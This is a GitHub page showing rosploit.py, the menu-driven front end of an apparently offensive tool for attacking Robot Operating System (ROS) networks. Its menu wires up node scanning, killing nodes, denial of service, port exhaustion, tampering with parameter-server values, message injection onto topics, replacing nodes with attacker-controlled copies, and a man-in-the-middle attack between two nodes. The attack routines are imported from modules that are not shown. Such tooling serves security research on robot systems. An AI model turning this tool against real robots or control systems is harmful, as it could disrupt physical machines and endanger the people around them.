-
Notifications
You must be signed in to change notification settings - Fork 1
/
rosploit.py
178 lines (143 loc) · 5.53 KB
/
rosploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
import signal
import sys
from typing import List
import exploit
import recon
from core import Node, Message, Topic
# Identifier this tool passes as the caller name to the node and exploit helpers.
node_name = "/rosploit"
# Nodes and topics known to the menu actions; both start out empty.
node_list, topic_list = [], []
def signal_handler(sig, frame):
    """
    Announce that a signal was caught and terminate with exit status 0.
    :param sig: the signal number handed over by the signal module (unused)
    :param frame: the interrupted stack frame (unused)
    :return: never returns; raises SystemExit
    """
    print('Caught signal Exiting')
    raise SystemExit(0)
def print_options():
    """
    Print the welcome banner followed by the numbered menu, one entry per line.
    The position of each numbered entry matches the index used to select it.
    """
    menu_lines = (
        "Welcome to rosploit",
        "Enter a number to activate that option",
        "0) Exit",
        "1) Run a scan of the system ",
        "2) Display current detected rosgraph",
        "3) Kill a node",
        "4) Run a DOS against a selected host",
        "5) Exhaust all open ports on a selected host",
        "6) List all the parameters on the parameter server",
        "7) Change a parameter on the parameter server",
        "8) Inject data onto a given topic",
        "9) Replace a node with a copy under your control",
        "10) Perform a Man in the Middle(MITM) attack against two nodes over a topic ",
    )
    for menu_line in menu_lines:
        print(menu_line)
def leave():
    """
    Ask whether the results should be saved, then exit with status 0.
    Saving is not implemented yet: answering 1 only prints "TODO".
    An answer that is not an integer is treated as "do not save", so a stray
    keystroke at the exit prompt no longer ends the program with a traceback.
    :return: never returns; raises SystemExit
    """
    answer = input("Would you like to save your results? (1 for yes)")
    try:
        save = int(answer)
    except ValueError:
        # Empty or non-numeric reply: fall back to "no" instead of crashing.
        save = 0
    if save == 1:
        print("TODO")
    sys.exit(0)
def scan_system():
    """
    Scan 127.0.0.1 through recon.scan_host and store the results in the
    module-level node_list and topic_list that the other menu actions read.
    For every node found, its publisher list, subscriber list and name are
    requested. Any node whose notes contain "Master" is asked for the published
    topics, which are turned into the topic list via Topic.from_master.
    NOTE(review): '1-' and the *.nse names are presumably an nmap port range
    and NSE scripts - confirm against recon.scan_host.
    """
    # Without this declaration the assignments below would only create locals
    # and the rest of the program would keep seeing the empty initial lists.
    global node_list, topic_list

    discovered: List[Node] = recon.scan_host('127.0.0.1', '1-', ['ros-master-scan.nse', 'ros-node-id.nse'])
    discovered_topics = []
    for node in discovered:
        node.get_pub_list(node_name)
        node.get_sub_list(node_name)
        node.get_name(node_name)
        if "Master" in node.notes:
            discovered_topics = Topic.from_master(node.server.getPublishedTopics(node_name, ""))

    # Publish both results together, and only after every query succeeded, so
    # a failure part-way through cannot leave nodes and topics out of step.
    node_list = discovered
    topic_list = discovered_topics
def print_graph():
    """
    Print every entry of node_list, then every entry of topic_list, one per line.
    """
    # TODO: Prettier graph
    for entry in [*node_list, *topic_list]:
        print(entry)
def kill_node():
    """
    Prompt for a node name and hand the first node in node_list with that name
    to exploit.kill_node. Prints a failure message when no node matches.
    """
    target_name = input("Enter the name of the node you want to kill")
    victim = next((candidate for candidate in node_list if candidate.name == target_name), None)
    if victim is None:
        print("Failed to find node to kill")
        return
    exploit.kill_node(victim, node_name=node_name)
def dos():
    """
    Prompt for a node name and pass the first node in node_list with that name
    to exploit.dos. Prints a failure message when no node matches.
    """
    target_name = input("Enter the name of the node you want to dos")
    for candidate in node_list:
        if candidate.name == target_name:
            exploit.dos(candidate)
            break
    else:
        # Only reached when the loop finished without hitting the break above.
        print("Failed to find node to dos")
def port_exhaust():
    """
    Prompt for a node name and pass the first node in node_list with that name
    to exploit.port_exhaust. Prints a failure message when no node matches.
    """
    target_name = input("Enter the name of the node you want to exhaust the ports of")
    for node in node_list:
        if node.name == target_name:
            exploit.port_exhaust(target_node=node, node_name=node_name)
            return
    # The message used to say "dos" (copied from the dos action); name the
    # action that actually failed.
    print("Failed to find node to exhaust the ports of")
def list_param():
    """
    Call exploit.list_parameters on the first node in node_list whose notes
    contain "Master". Prints a failure message when there is no such node.
    """
    master = next((candidate for candidate in node_list if "Master" in candidate.notes), None)
    if master is None:
        print("Failed to find the parameter server")
        return
    exploit.list_parameters(master, node_name)
def change_param():
    """
    Prompt for a parameter name and a new value, then pass both to
    exploit.change_parameter together with the first node in node_list whose
    notes contain "Master". Prints a failure message when there is no such node.
    """
    target_param = input("Enter the name of the param you want to change")
    target_value = input("Enter the new value of the param")
    for candidate in node_list:
        if "Master" not in candidate.notes:
            continue
        exploit.change_parameter(candidate, node_name, target_param, target_value)
        break
    else:
        print("Failed to find the parameter server")
def message_inject():
    """
    Prompt for a topic name, a node name and a JSON message, then inject the
    message through exploit.message_injection.
    The first node in node_list and first topic in topic_list with the given
    names are used; the JSON text is converted with Message.from_json.
    The failure message is printed only when no such node/topic pair exists.
    """
    target_topic = input("Enter the name of the topic you want to inject")
    target_node = input("Enter the name of the node you want to inject to")
    target_message = input("Enter the message you want to inject (json)")
    for node in node_list:
        if node.name != target_node:
            continue
        for topic in topic_list:
            if topic.name == target_topic:
                exploit.message_injection(target_node=node, target_topic=topic, node_name=node_name,
                                          message=Message.from_json(target_message))
                # Stop here: without this return the failure message below
                # was printed even after a successful injection.
                return
    print("Failed to find the topic to inject")
def replace_node():
    """
    Prompt for a node name and pass the first node in node_list with that name
    to exploit.replace_node. Prints a failure message when no node matches.
    """
    target_node = input("Enter the name of the node you want to replace")
    # TODO: Consider more parameters
    for node in node_list:
        if node.name == target_node:
            exploit.replace_node(target_node=node, node_name=node_name)
            # Stop here: without this return the failure message below was
            # printed even after the replacement had been started.
            return
    print("Failed to replace the node")
def mitm_dummy(message: Message, topic: Topic):
    """
    Placeholder interface function for the mitm attack: publishes the given
    message on the topic two times in a row.
    :param message: The last received message from the publisher
    :param topic: the topic to publish the duplicated message on
    :return: None
    """
    for _ in range(2):
        topic.publish(message)
def mitm():
    """
    Prompt for two node names and a topic name, then start exploit.mitm between
    those nodes on that topic, using mitm_dummy as the interface function.
    When several nodes share a name, the last one in node_list is used; for the
    topic, the first match in topic_list is used. Prints a failure message when
    either node or the topic cannot be found.
    """
    # Currently the demo function just doubles messages
    target_node1 = input("Enter the name of the first node you want to attack for the mitm")
    target_node2 = input("Enter the name of the second node you want to attack for the mitm")
    topic_name = input("Enter the name of the topic you want to attack for the mitm")

    first = second = None
    for candidate in node_list:
        if candidate.name == target_node2:
            second = candidate
        if candidate.name == target_node1:
            first = candidate

    if not (first and second):
        print("Failed to find both nodes or topic")
        return

    for candidate_topic in topic_list:
        if candidate_topic.name != topic_name:
            continue
        exploit.mitm(node1=first, node2=second, topic=candidate_topic, node_name=node_name,
                     interface_func=mitm_dummy)
        return
    print("Failed to find both nodes or topic")
def rosploit():
    """
    Run the interactive menu: install the SIGINT handler, then repeatedly show
    the options, read a number and run the action stored at that index.
    Input that is not an integer, or that is outside the range of available
    actions, is echoed back followed by "Invalid Option" and the menu is shown
    again. Option 0 exits the program.
    """
    signal.signal(signal.SIGINT, signal_handler)
    # Index in this list == number shown by print_options().
    # sys.exit replaces the bare `exit` helper, which is only injected by the
    # site module and is meant for interactive sessions.
    # NOTE(review): leave() is defined in this file but not wired in here;
    # confirm whether option 0 should call it instead.
    function_list = [
        sys.exit,
        scan_system,
        print_graph,
        kill_node,
        dos,
        port_exhaust,
        list_param,
        change_param,
        message_inject,
        replace_node,
        mitm,
    ]
    while True:
        print_options()
        raw_option = input("Select option:")
        try:
            option = int(raw_option)
        except ValueError:
            # Non-numeric input used to abort the whole program.
            print(raw_option)
            print("Invalid Option")
            continue
        # The old check (`option > len`) let option == len through to an
        # IndexError and let negative numbers index from the end of the list.
        if not 0 <= option < len(function_list):
            print(option)
            print("Invalid Option")
            continue
        function_list[option]()
# Start the interactive menu only when this file is run as a script.
if __name__ == "__main__":
    rosploit()